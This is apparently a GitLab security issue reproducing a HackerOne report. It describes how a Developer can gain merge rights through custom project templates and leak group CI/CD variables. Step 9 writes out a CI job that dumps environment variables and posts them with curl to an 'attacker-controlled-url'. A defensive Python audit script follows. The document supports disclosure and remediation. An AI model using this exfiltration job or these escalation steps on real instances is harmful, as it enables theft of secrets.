Developer can leak group and any subgroup’s CI/CD variables using Custom project templates functionality

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2021616 by theluci on 2023-06-12, assigned to @ottilia_westerlund:

Report

Hello,
GitLab recently fixed several bugs that allowed a developer to import a project and leak a group's CI/CD variables. To protect against these types of attacks, GitLab set the minimum role for importing projects to Maintainer.
GitLab also made the Custom project templates functionality reusable by developers in the Enterprise Edition.
However, I found a bug through which a Developer can leak a group's or any subgroup's CI/CD variables using the Custom project templates functionality.

Background

GitLab provides a Premium/Ultimate feature, the custom project templates functionality.
The owner of the top-level group can set a subgroup to be used as a source of custom templates for new projects in the group and in any of the subgroups.

Vulnerability

When issue #407374 (closed) was fixed, GitLab changed the import logic as follows.
When a member imports a project where specific members are Allowed to merge/Allowed to push and merge:

high1.png

Then GitLab replaces the user_id of the member allowed to merge with the user_id of the member importing the project.
That is, the member importing the project gets Allowed to merge/Allowed to push and merge access on the protected branch.

<------------------------------------------Important---------------------------------------------->
It was probably assumed that only maintainers/owners can import a project, so their getting Allowed to merge access would not be a bug.
However, the Custom project template functionality internally imports the template project.
Thus, if any maintainer, owner, or other member has Allowed to merge permission on a protected branch of any of the templates, then a developer can just import the template (using the custom project template functionality) and get the Allowed to merge setting on the protected branch.
<------------------------------------------------------------------------------------------------------>

Steps to reproduce

(Your instance must have an Ultimate trial)

  1. victim creates a group victim-group.
  2. victim creates a subgroup subgroup-to-be-template and template projects template1,template2 inside.
  3. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/edit, Expand Custom project templates and select subgroup-to-be-template
  4. victim goes to template1 repository settings http://<Your_Instance_IP>/<victim-group>/<subgroup-to-be-template>/template1/-/settings/repository, Expand Protected branches and gives himself Allowed to merge OR Allowed to push and merge access on protected branch.

high2.png

In a real-world scenario, it may not be the owner but any member (maybe a maintainer or some other member) that has Allowed to merge/Allowed to push and merge access on a protected branch of any of the templates.
It might also be possible that no roles are Allowed to merge/Allowed to push and merge but only specific users (any user).

As victim,
  5. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/settings/ci_cd, Expand Variables and adds some CI/CD variables.
  6. victim goes to http://<Your_Instance_IP>/groups/<victim-group>/-/group_members and adds attacker as Developer.

As attacker,
  7. attacker goes to victim-group, clicks on New project and chooses Create from template.
  8. attacker uses template1 and creates attacker-project.
     The attacker now has Allowed to merge/Allowed to push and merge access on the protected branch of attacker-project.
  9. attacker adds the following .gitlab-ci.yml file:

job_name:
  script:
    - export > test.txt
    - curl -X POST --data "$(cat test.txt)" attacker-controlled-url

The group's CI/CD variables are sent to attacker-controlled-url.

Output of checks

This bug happens on a self-hosted GitLab instance.

Results of GitLab environment info

System information  
System:         Ubuntu 20.04  
Proxy:          no  
Current User:   git  
Using RVM:      no  
Ruby Version:   3.0.6p216  
Gem Version:    3.4.13  
Bundler Version:2.4.13  
Rake Version:   13.0.6  
Redis Version:  6.2.11  
Sidekiq Version:6.5.7  
Go Version:     unknown

GitLab information  
Version:        16.0.4-ee  
Revision:       7d6834bd32e  
Directory:      /opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:     PostgreSQL  
DB Version:     13.11  
URL:            http://x.x.x.x  
HTTP Clone URL: http://x.x.x.x/some-group/some-project.git  
SSH Clone URL:  git@x.x.x.x:some-group/some-project.git  
Elasticsearch:  no  
Geo:            no  
Using LDAP:     no  
Using Omniauth: yes  
Omniauth Providers:

GitLab Shell  
Version:        14.20.0  
Repository storages:  
- default:      unix:/var/opt/gitlab/gitaly/gitaly.socket  
GitLab Shell path:              /opt/gitlab/embedded/service/gitlab-shell  

Impact

A Developer of a group can leak the group's or any subgroup's CI/CD variables.
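The following audit script is an added example; it is not part of the HackerOne report and not GitLab's own code. It checks the projects of the subgroup selected under Custom project templates for the precondition the report relies on: a specific user, rather than a role, being Allowed to merge or Allowed to push and merge on a protected branch. It uses GitLab's REST endpoints GET /projects/:id/protected_branches and GET /groups/:id/projects; the sample payload, the project paths (taken from the reproduction steps above), and the base_url and token parameters are assumptions for the offline run, and only the fetch_* functions contact a live instance.

```python
"""Audit a custom-project-template subgroup for user-specific protected-branch
access entries (Allowed to merge / Allowed to push and merge bound to a user).

Added example, not part of the HackerOne report and not GitLab's own code.
Relies on the response shape of GET /projects/:id/protected_branches (entries
in merge_access_levels / push_access_levels carry access_level, user_id,
group_id) and GET /groups/:id/projects. SAMPLE_BRANCHES is a constructed
payload so the audit runs offline; only fetch_* functions hit a live instance.
"""
import json
import urllib.parse
import urllib.request

# Constructed sample for template1 after step 4 of the report: the owner
# (user_id 7) added as a specific user Allowed to merge on main, plus a
# release branch where a bot user (user_id 12) is Allowed to push and merge.
SAMPLE_BRANCHES = [
    {"name": "main",
     "push_access_levels": [
         {"access_level": 40, "access_level_description": "Maintainers",
          "user_id": None, "group_id": None}],
     "merge_access_levels": [
         {"access_level": 40, "access_level_description": "Maintainers",
          "user_id": None, "group_id": None},
         {"access_level": 40, "access_level_description": "victim",
          "user_id": 7, "group_id": None}]},
    {"name": "release",
     "push_access_levels": [
         {"access_level": 40, "access_level_description": "release-bot",
          "user_id": 12, "group_id": None}],
     "merge_access_levels": [
         {"access_level": 40, "access_level_description": "Maintainers",
          "user_id": None, "group_id": None}]},
]

SETTINGS = (("merge_access_levels", "Allowed to merge"),
            ("push_access_levels", "Allowed to push and merge"))


def _get(base_url, path, token):
    """GET an API path on a live instance and decode the JSON body."""
    req = urllib.request.Request(f"{base_url.rstrip('/')}/api/v4/{path}",
                                 headers={"PRIVATE-TOKEN": token})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


def fetch_protected_branches(base_url, project_path, token):
    """GET /projects/:id/protected_branches, :id being the URL-encoded full path."""
    return _get(base_url, f"projects/{urllib.parse.quote(project_path, safe='')}"
                          "/protected_branches", token)


def fetch_group_projects(base_url, group_path, token):
    """GET /groups/:id/projects (first page only; paginate past 100 projects)."""
    return _get(base_url, f"groups/{urllib.parse.quote(group_path, safe='')}"
                          "/projects?per_page=100", token)


def user_specific_entries(branch):
    """Yield (setting, entry) for each access entry bound to a single user.

    Per the report, an import rewrites the user_id of such an entry to the
    importing user, so on a template project every one of them is a finding.
    Role entries (user_id None) are left alone.
    """
    for key, setting in SETTINGS:
        for entry in branch.get(key, []):
            if entry.get("user_id") is not None:
                yield setting, entry


def audit_template_project(project_path, branches):
    """Return one finding per user-specific entry across the project's branches."""
    return [{"project": project_path, "branch": b["name"], "setting": setting,
             "user_id": e["user_id"],
             "description": e.get("access_level_description", "")}
            for b in branches for setting, e in user_specific_entries(b)]


def audit_template_subgroup(base_url, subgroup_path, token):
    """Audit every project in the subgroup chosen under Custom project templates."""
    findings = []
    for project in fetch_group_projects(base_url, subgroup_path, token):
        path = project["path_with_namespace"]
        findings += audit_template_project(
            path, fetch_protected_branches(base_url, path, token))
    return findings


def main():
    # Offline run against the constructed sample; the path follows the report.
    for f in audit_template_project(
            "victim-group/subgroup-to-be-template/template1", SAMPLE_BRANCHES):
        print(f"{f['project']}@{f['branch']}: {f['setting']} granted to "
              f"user {f['user_id']} ({f['description']})")


if __name__ == "__main__":
    main()
```

Run against a live instance as audit_template_subgroup("http://<Your_Instance_IP>", "victim-group/subgroup-to-be-template", token) with a token that can read the subgroup. Every finding is an entry that, per the report, a Developer creating a project from that template inherits on the new project's protected branch; replacing those user-specific entries with role-based ones removes the precondition the reproduction steps depend on.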

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Edited by Kevin Morrison